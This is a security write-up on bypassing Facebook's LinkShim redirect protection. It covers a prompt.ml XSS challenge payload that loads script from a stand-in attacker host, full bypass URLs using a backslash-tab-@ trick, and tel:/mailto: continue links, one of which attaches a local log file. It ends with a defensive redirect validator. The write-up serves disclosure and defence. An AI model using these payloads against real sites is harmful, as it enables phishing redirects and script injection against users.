How I bypassed Facebook's LinkShim again
I previously discovered a URL redirection and XSS vulnerability on Facebook and successfully bypassed LinkShim. Facebook then fixed the vulnerability. Six months later I found another way to bypass LinkShim on the same URL, and I am sharing it here for everyone to learn from.
2cto: What is LinkShim?
LinkShim is a protection mechanism Facebook uses to prevent users from being redirected to malicious websites. When you follow a link to a malicious website from Facebook, a warning window like the one below pops up to remind you of this.
First, a small but neat technical point, which I learned from the fourth level of the prompt.ml XSS challenge.
See the following code:
function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}
This is the JS source code of the fourth level; the goal is to bypass the regular-expression check and have the script loaded from another site. The main problem is that the check runs on the output of decodeURIComponent(), while the browser loads the raw input, so we can trick the browser into treating part of the URL as HTTP auth credentials:
http://prompt.ml\@attacker.com
This passes the regular expression because it contains prompt.ml, but the browser is actually sent to attacker.com.
When I looked at this Facebook URL redirection vulnerability, I noticed how similar the two are.
When you visit this link:
https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=http://evilzone.org
LinkShim is triggered and asks the user to confirm the jump; evilzone.org is obviously on the blacklist.
Then I tried \/evilzone.org to bypass it, because most browsers will treat \/evilzone.org as //evilzone.org.
For more details, see http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html
Unfortunately, \/ was also intercepted, so I started fuzzing.
Eventually an expert told me that \%09/@site.com could bypass it. It is equivalent to //@site.com but is not on the blacklist.
So in the end I bypassed it like this:
https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=\%09/@example.com
During testing I found that both tel: and mailto: can also be used, so we can construct links like these:
https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=tel:+251928475100
https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=mailto:lastname.firstname@xxx.com?subject=APPname%20support%20issue&body=Version%20x.x%0D%0A%0D%0APlease%20make%20some%20descriptions%20here:%0D%0A%0D%0A%0D%0A&attach=C:\Documents%20and%20Settings\username\Desktop\foldername\APPname_20121123.log
This composes an email whose attachment contains sensitive user information.
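Every bypass above works because the validator and the browser read the continue= value differently (percent-decoding, the backslash, the %09 tab, the @ userinfo separator, or a non-http scheme). As an added defender-side example, not code from the original post or from Facebook, here is a validator for a redirect parameter that decodes once, refuses the characters that cause that divergence, and then allowlists the host; the allowlist and the function name are my own assumptions.

```python
from urllib.parse import urlsplit, unquote

# Constructed allowlist for this example: the only hosts a "continue="
# style parameter is permitted to send the user to.
ALLOWED_HOSTS = {"m.facebook.com", "www.facebook.com"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a redirect destination we control.

    The checks are ordered so that the raw string is normalised first and
    parsed only after every ambiguous character has been rejected.
    """
    # Decode once so that %09 (tab), %5C (backslash) and %40 (@) cannot hide
    # from the checks below. Decoding twice would reintroduce the mismatch.
    decoded = unquote(target)
    # Browsers strip tabs/newlines from scheme and authority and treat '\'
    # as '/', so a checker that keeps them sees a different URL. Reject both.
    if any(ord(ch) < 0x20 for ch in decoded) or "\\" in decoded:
        return False
    # A same-origin relative path needs exactly one leading '/'; '//host'
    # is a scheme-relative URL and must go through the host check instead.
    if decoded.startswith("/") and not decoded.startswith("//"):
        return True
    parts = urlsplit(decoded)
    # Only http(s); tel:, mailto:, javascript: and friends are refused.
    if parts.scheme.lower() not in ("http", "https"):
        return False
    # Userinfo ("name@host") lets an allowlisted name sit in front of the
    # real host, which is the prompt.ml trick described above.
    if "@" in parts.netloc or parts.hostname is None:
        return False
    return parts.hostname.lower() in allowed_hosts
```

Each payload from the write-up fails a different check, which is the point: rejecting one character at a time, as the blacklist did, leaves the next variant open.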